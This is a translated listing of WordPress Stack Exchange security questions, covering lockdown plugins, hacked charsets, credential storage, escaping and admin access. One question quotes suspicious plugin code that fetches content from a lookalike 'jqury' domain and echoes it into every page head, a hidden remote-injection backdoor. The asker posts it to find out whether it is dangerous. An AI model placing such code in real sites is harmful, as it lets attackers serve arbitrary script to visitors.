Вопросы с тегом «security»

Закрыто. Этот вопрос не по теме . В настоящее время не принимает ответы. Хотите улучшить этот вопрос? Обновите вопрос, чтобы он подходил для WordPress Development Stack Exchange. Закрыто 4 года назад . Я установил плагин Simple Login Lockdown и пару дней назад база данных записывала более 200 записей в день. …

20 login  security 

У меня был клиент, которого недавно взломали, и я заметил, что на ее сайте появляются странные персонажи, такие как Â и Æ. Оказывается, хакеры изменили blog_charset на UTF-7 в wp_optionsтаблице в базе данных. Я установил его обратно в UTF-8, но мне было интересно, может ли это привести к появлению каких-либо …

19 security  encoding  hacked  characters 

Я новичок в WordPress. Недавно я прочитал статью о том, как хакеры могут использовать уязвимости в плагинах. Различные источники, такие как Google Pagespeed, также отговаривали меня от использования плагинов или, по крайней мере, сводили его к минимуму. Лично я также стараюсь избегать плагинов, потому что я чувствую больше контроля над …

19 plugins  security 

В настоящее время я разрабатываю плагин, и есть вероятность, что я, скорее всего, опубликую его в общедоступном хранилище плагинов, чтобы другие могли его использовать. Плагин будет использовать API, и для использования этого API вам необходимо передать имя пользователя и пароль. Так что мой плагин должен хранить эти учетные данные для …

19 plugin-development  security  api  encryption 

Я нашел это в плагине. Что оно делает? Это опасно? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

Я хочу убедиться, что все данные в моих плагинах / темах надежно обрабатываются перед входом в базу данных и перед выводом в браузер. Моя проблема в том, что есть ситуации, когда API обрабатывает санацию для вас - например, при сохранении мета-полей поста - и другие, где автор плагина / темы …

17 plugin-development  security  customization  validation  sanitization 

Сохранение wp-admin/install.phpи wp-admin/install-helper.phpутечка безопасности на более новых версиях WordPress? По умолчанию разрешение на доступ к этим файлам составляет 644. Если есть какая-либо утечка, что за пожалуйста?

16 security  installation 

В настоящее время этот вопрос не очень подходит для нашего формата вопросов и ответов. Мы ожидаем, что ответы будут подтверждены фактами, ссылками или опытом, но этот вопрос, скорее всего, вызовет дебаты, споры, опрос или расширенное обсуждение. Если вы считаете, что этот вопрос можно улучшить и, возможно, вновь открыть, обратитесь за …

16 plugins  plugin-development  security  sql 

Я вижу, что SVG по умолчанию заблокированы в загрузчике мультимедиа, и вы должны добавить его как поддерживаемый тип MIME в functions.php. Какие причины безопасности стоят за этим?

15 media  security  svg 

Я посмотрел на код, но я не мог увидеть какие-либо экранирующие функции, например, the_title the_content the_excerptи т. Д. Я, возможно, не правильно его читал. Нужно ли мне избежать этих функций в разработке темы, как: esc_html ( the_title () ) Изменить: как указано в ответах ниже, приведенный выше код неверен независимо …

15 security  escaping 

У нас возникли проблемы с внешним разработчиком. Мы хотим ограничить доступ к wp-adminсайту только внутренним доступом (через VPN ). Просто так он не будет атакован внешними пользователями. Мы можем перечислить администраторов с сайта и не хотим, чтобы они были фишинговыми. Наш разработчик говорит, что мы не можем этого сделать, потому …

14 admin  ajax  security 

Просто быстрый вопрос, который может немного помочь с безопасностью. Я заметил, что в файле readme.html указан номер версии. Он появляется после каждого обновления, как и licence.txt, и wp-config-sample.php. Есть ли простой способ, чтобы WordPress автоматически удалял эти файлы после обновления? Я уже блокирую отображение номера версии в метатегах, RSS-каналах, Atom …

13 security  wp-config 

Настройка WordPress для обновления внутри приложения (т.е. WordPress) идеально подходит для меня из-за его удобства. Тем не менее, я обеспокоен требованиями. Запрашиваемые поля, которые появляются после установки ssh2 для php, спрашивают не только мой открытый ключ, но и мой личный ключ. Я думаю, что, в лучшем случае, потребуется только открытый …

13 security  updates  ssh 

Глядя на Кодекс для wp_insert_post (), он утверждает, что эта функция «... очищает переменные, выполняет некоторые проверки, заполняет отсутствующие переменные, такие как дата / время и т. Д.» (РЕДАКТИРОВАТЬ: я обновил запись Кодекса, чтобы включить более надежный пример включает в себя безопасность, а также метаданные и назначение категории) Просто интересно, …

13 security  sanitization 

Эта вещь делает мое кодирование трудным. Кодекс Wordpress обуславливает использование esc_url, расплывчато о безопасности. Но стоит ли это того? Например, что является важным, практическим преимуществом безопасности при использовании <?php echo esc_url( home_url( '/' ) ); ?> вместо того <?php echo home_url() ?> PS: я говорю не о разработке темы, а …

12 security